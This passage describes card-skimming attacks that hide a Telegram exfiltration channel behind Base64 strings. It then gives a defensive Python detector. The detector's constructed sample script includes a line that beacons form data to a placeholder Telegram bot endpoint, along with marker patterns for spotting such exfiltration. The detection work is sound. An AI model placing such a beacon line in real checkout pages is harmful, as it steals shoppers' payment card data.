According to BankInfoSecurity, the attackers use simple Base64-encoded strings together with a bot that sweeps up the payment card information, and include code that contacts Telegram to carry the stolen payment card data out. This Base64 encoding is what lets the payment card data be taken without security tools noticing the theft. Other cybercriminals had previously used Telegram to distribute malware and steal data, but the first time fraud of this kind was detected on the channel was in August 2020, by security researcher AffableKraut.
Moreover, in most skimming attacks the payment card data is stored in a domain or file controlled by the attackers and then exfiltrated through a command-and-control infrastructure that communicates with JavaScript code. The attacks leveraging Telegram, by contrast, use encryption together with a Telegram channel to make the exfiltration faster and more efficient.
Consequently, when a shopper enters payment information on an e-commerce site, that information goes to the payment processor as usual, but a copy is also sent to the fraudsters. Using Telegram lets the attackers collect the payment card data quickly and use it to purchase goods or sell it on underground forums, a method that helps them avoid detection.
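As an added illustration from the detection side (not code from the BankInfoSecurity report or from the skimmer itself), the following Python scans a page script for Telegram Bot API endpoints, including ones hidden behind Base64 literals as described above. The sample script, the endpoint and the bot token are constructed placeholders.

```python
import base64
import re

# Constructed sample of an inline page script (not a real skimmer): the
# Telegram bot endpoint sits inside a Base64 literal, so a plain grep for
# "api.telegram.org" on the script source would miss it. Token is a placeholder.
HIDDEN_ENDPOINT = "https://api.telegram.org/bot<PLACEHOLDER_TOKEN>/sendMessage"
SAMPLE_SCRIPT = (
    "var dest = atob('" + base64.b64encode(HIDDEN_ENDPOINT.encode()).decode() + "');\n"
    "var greet = atob('aGVsbG8gd29ybGQ=');\n"  # benign literal: 'hello world'
    "navigator.sendBeacon(dest + '?chat_id=1&text=' + btoa(formData));\n"
)

# Quoted strings that look like Base64 (12+ alphabet chars, optional padding).
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{12,}={0,2})['\"]")
# Substrings that identify the Telegram Bot API in decoded or plain text.
TELEGRAM_MARKERS = ("api.telegram.org", "/sendmessage", "/senddocument")


def decode_base64_literals(script: str) -> list[str]:
    """Return the decoded text of every Base64-looking literal that decodes to ASCII."""
    decoded = []
    for literal in B64_LITERAL.findall(script):
        try:
            text = base64.b64decode(literal, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64, or binary payload: ignore
        decoded.append(text)
    return decoded


def find_telegram_indicators(script: str) -> list[str]:
    """Flag lines referencing the Telegram Bot API, in clear or hidden in Base64."""
    candidates = [script] + decode_base64_literals(script)
    hits = []
    for text in candidates:
        for line in text.splitlines():
            if any(marker in line.lower() for marker in TELEGRAM_MARKERS):
                # Keep the evidence for the analyst, with the bot token masked.
                hits.append(re.sub(r"/bot[^/]+/", "/bot<redacted>/", line.strip()))
    return hits


if __name__ == "__main__":
    for hit in find_telegram_indicators(SAMPLE_SCRIPT):
        print("Telegram exfiltration indicator:", hit)
```

The same marker check applied to outbound request logs from checkout pages (host api.telegram.org) gives a second, network-side signal for the same behaviour.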